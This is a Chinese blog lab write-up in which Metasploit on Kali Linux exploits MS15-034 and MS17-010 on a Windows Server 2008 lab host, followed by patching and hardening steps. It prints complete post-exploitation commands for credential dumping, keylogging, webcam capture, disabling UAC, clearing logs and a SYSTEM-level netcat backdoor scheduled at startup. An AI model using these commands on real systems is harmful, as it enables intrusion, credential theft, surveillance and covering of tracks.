网络安全: Kali Linux 使用 MSF 漏洞利用

cronaldo912024-03-07 18:16

目录

一、实验

1.环境

[2.POC验证与nmap扫描( ms15-034 )](#2.POC验证与nmap扫描( ms15-034 ))

[3. Kali Linux 使用 MSF 漏洞利用( ms15-034 )](#3. Kali Linux 使用 MSF 漏洞利用( ms15-034 ))

[4.Windows server 安全加固](#4.Windows server 安全加固)

[5.Windows server 安装补丁](#5.Windows server 安装补丁)

[6. Kali Linux 使用 MSF 漏洞验证 ( ms17-010)](#6. Kali Linux 使用 MSF 漏洞验证 ( ms17-010))

[7. Kali Linux 使用 MSF 漏洞利用( ms17-010 )](#7. Kali Linux 使用 MSF 漏洞利用( ms17-010 ))

[8. Kali Linux 进行 MSF 后渗透](#8. Kali Linux 进行 MSF 后渗透)

[9. Kali Linux 使用 持久性后门( nc)](#9. Kali Linux 使用 持久性后门( nc))

二、问题

1.CMD防火墙如何配置

2.CMD注册表如何配置

3.CMD计划任务如何配置

一、实验

1.环境

(1)主机

表1 主机

|----------------|---------|-----------------------------------------|-------------------|
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2024.1 | 192.168.204.146(动态) 192.168.204.100(静态) | |
| Windows server | 2008 R2 | 192.168.204.150 | Kali(2024.1)的目标主机 |

(2)查看Kali Linux (2024.1)系统版本

bash 复制代码 
cat /etc/os-release

(3)查看Kali Linux (2024.1)系统IP地址

bash 复制代码 
ip addr

(4) 查看Windows server 2008 IP 地址

bash 复制代码 
ipconfig

(5)openvas查看报告

点击CVEs查看通用漏洞编号(cve-2015-1635)

2.POC验证与nmap扫描( ms15-034 )

(1)执行验证脚本

VULN 存在漏洞

bash 复制代码 
 python2 cve-2015-1635.poc

(2)进入MSF 控制台

msfconsole

(3)扫描网段

目标主机为192.168.204.150

bash 复制代码 
db_nmap -sP 192.168.204.0/24

(4)扫描开放端口

bash 复制代码 
db_nmap -sV 192.168.204.150

3. Kali Linux 使用 MSF 漏洞利用( ms15-034 )

(1) 搜索 ms15-034 脚本

bash 复制代码 
search ms15-034

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

bash 复制代码 
 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run

查看Windows server状态

4.Windows server 安全加固

(1)IIS管理器

(2)打开功能

(3)编辑功能设置

(4)关闭内核缓存

修改前:

修改后:

5.Windows server 安装补丁

(1)Windows 补丁查询

Microsoft Update Catalog

(2)搜索

bash 复制代码 
KB3042553

(3)安装补丁

重启

(4)Kali Lnux (2024.1) 使用MSF运⾏脚本

run

(5)Windows server

保持正常

(6)POC验证

Patched 补丁已修复

bash 复制代码 
 python2 cve-2015-1635.poc

6. Kali Linux 使用 MSF 漏洞验证 ( ms17-010)

(1) 进入MSF 控制台

msfconsole

(2) 搜索 ms17-010 脚本

bash 复制代码 
search ms17-010

(2) 使⽤编号为 0 的脚本

bash 复制代码 
use 3

(3) 设置⽬标主机

bash 复制代码 
 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run

7. Kali Linux 使用 MSF 漏洞利用( ms17-010 )

(1) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

bash 复制代码 
 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

bash 复制代码 
run

8. Kali Linux 进行 MSF 后渗透

(1)获取windows 服务器的密⽂密码

Administrator第3个冒号后内容为密码

bash 复制代码 
hashdump

(2) 解密

第一种方式:

bash 复制代码 
https://cmd5.com/

第二种方式:

MSF加载kiwi模块

(3)使用kiwi模块获取明⽂密码

加载 kiwi 模块

bash 复制代码 
load kiwi

检测所有凭证

bash 复制代码 
creds_all

(4)屏幕截图

bash 复制代码 
screenshot

(5)屏幕共享

bash 复制代码 
screenshare

(6)监控摄像头

bash 复制代码 
webcam_stream

(7)进程迁移

获取用户身份和进程列表

bash 复制代码 
getuid

getpid

查找 explorer 进程 (2704)

bash 复制代码 
 ps -S explorer

迁移进程到 explorer

bash 复制代码 
 migrate  2704

再次获取用户身份( 具有 administrator ⾝份)

bash 复制代码 
getuid

进程列表已切换

bash 复制代码 
getpid

(8)执⾏键盘操作记录

bash 复制代码 
run post/windows/capture/keylog_recorder

Windows server 新建文本文件

查看键盘操作记录

bash 复制代码 
vim /root/.msf4/loot/20240306131129_default_192.168.204.150_host.windows.key_889524.txt

结束 (CTRL + C)

(9)防⽕墙配置

进入 windows2008 的 cmd

消除乱码

bash 复制代码 
chcp  65001

检查防火墙状态 (目前为关闭)

防火墙设置开启状态

bash 复制代码 
netsh  advfirewall  set  allprofiles  state on

防火墙设置关闭状态

bash 复制代码 
netsh  advfirewall  set  allprofiles  state off

防火墙添加指定端口并启用 (后门端口别名为backdoor)

bash 复制代码 
netsh firewall add portopening tcp 444 backdoor enable all

查看

(10)UAC (用户账户控制设置)管理

查看

调整到最高

关闭

bash 复制代码 
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

开启

bash 复制代码 
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

(11)清除日志

查看日志

应用程序日志

安全日志

安装日志

系统日志

退出 win2008 cmd

bash 复制代码 
exit

清除日志

bash 复制代码 
clearev

查看日志

9. Kali Linux 使用 持久性后门( nc)

(1)查看后门程序(nc.exe)

bash 复制代码 
ls /usr/share/windows-binaries

(2)上传后⻔程序nc.exe 到Windows server

bash 复制代码 
 upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32

查看

(3)查看任务计划

WIN + R

bash 复制代码 
taskschd.msc

查看

(4) 进入 cmd 命令⾏

bash 复制代码 
cmd

(5)消除乱码

bash 复制代码 
chcp 65001

(6)配置注册表开机⾃启

bash 复制代码 
schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" /sc onstart

查看

(7)重启

(8)查看进程

CTRL + SHIFT + ESC

(9)后门接入

bash 复制代码 
 nc 192.168.204.150 444

退出

bash 复制代码 
exit

二、问题

1.CMD防火墙如何配置

(1)配置

bash 复制代码 
netsh:network shell ⽹络管理⼯具
advfirewall:advanced firewall ⾼级防火墙
set:设置
allprofiles:all 所有的profiles 配置
state:状态
off:关闭
on:开启

2.CMD注册表如何配置

(1)配置

bash 复制代码 
ADD 添加⼀个注册表项
/v 创建键值  
/t 键值类型 
/d 键值的值                   1开/0关
/f  覆盖现有注册表项

3.CMD计划任务如何配置

(1)配置

bash 复制代码 
schtasks:scheduled tasks 计划任务
/create:创建
/tn: task name 任务名称
/ru:run user 运⾏⽤户
system:系统⽤户
/tr:task run 任务执⾏的操作
-Ldp:Listen and port 监听端⼝
-e:execute 执⾏
/sc:schedule 计划任务表示计划任务触发的时机
onstart:开机
相关推荐
csbDD1 小时前
2025年网络安全(黑客技术)三个月自学手册
linux·网络·python·安全·web安全
李狗蛋儿啊1 小时前
zero自动化框架搭建---Git安装详解
运维·git·自动化
小金的学习笔记2 小时前
如何在本地和服务器新建mysql用户和密码
运维·服务器·mysql
s_fox_2 小时前
nginx ngx_http_module(7) 指令详解
运维·nginx·http
EasyNVR2 小时前
EasyRTC智能硬件:实时畅联、沉浸互动、消音护航
运维·服务器·网络·安全·音视频·webrtc·p2p
CarryBest2 小时前
Jenkins 环境搭建---基于 Docker
运维·jenkins
阿湯哥2 小时前
越权漏洞及其修复方法
网络·安全·web安全
若云止水3 小时前
Ubuntu 下 nginx-1.24.0 源码分析 - ngx_process_options
运维·nginx
s_fox_3 小时前
nginx ngx_http_module(9) 指令详解
运维·nginx·http
Natsuagin3 小时前
轻松美化双系统启动界面与同步时间设置(Windows + Ubuntu)
linux·windows·ubuntu·grub
热门推荐
01本地部署DeepSeek教程(Mac版本)02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek本地部署详细指南04DeepSeek各版本说明与优缺点分析05本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程06DeepSeek r1本地安装全指南07太炸裂了!清华大学deepseek从入门到精通使用手册又出第三版了,《普通人如何抓住DeepSeek红利》(无套路,直接下载)08DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具09在Windows下安装Ollama并体验DeepSeek r1大模型10Page Assist - 本地Deepseek模型 Web UI 的安装和使用